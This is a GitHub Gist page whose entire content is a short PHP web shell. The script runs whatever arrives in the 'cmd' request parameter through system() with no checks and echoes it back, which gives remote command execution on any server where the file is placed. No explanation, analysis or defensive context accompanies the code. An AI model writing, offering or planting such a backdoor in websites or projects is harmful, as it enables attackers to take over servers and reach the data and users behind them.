Created
June 6, 2017 12:35
-
-
Save empijei/b0ba953fa549c41d1f5b8341e5fdd7ce to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(isset($_REQUEST['cmd'])){ | |
$cmd = ($_REQUEST["cmd"]); | |
system($cmd); | |
echo "</pre>$cmd<pre>"; | |
die; | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment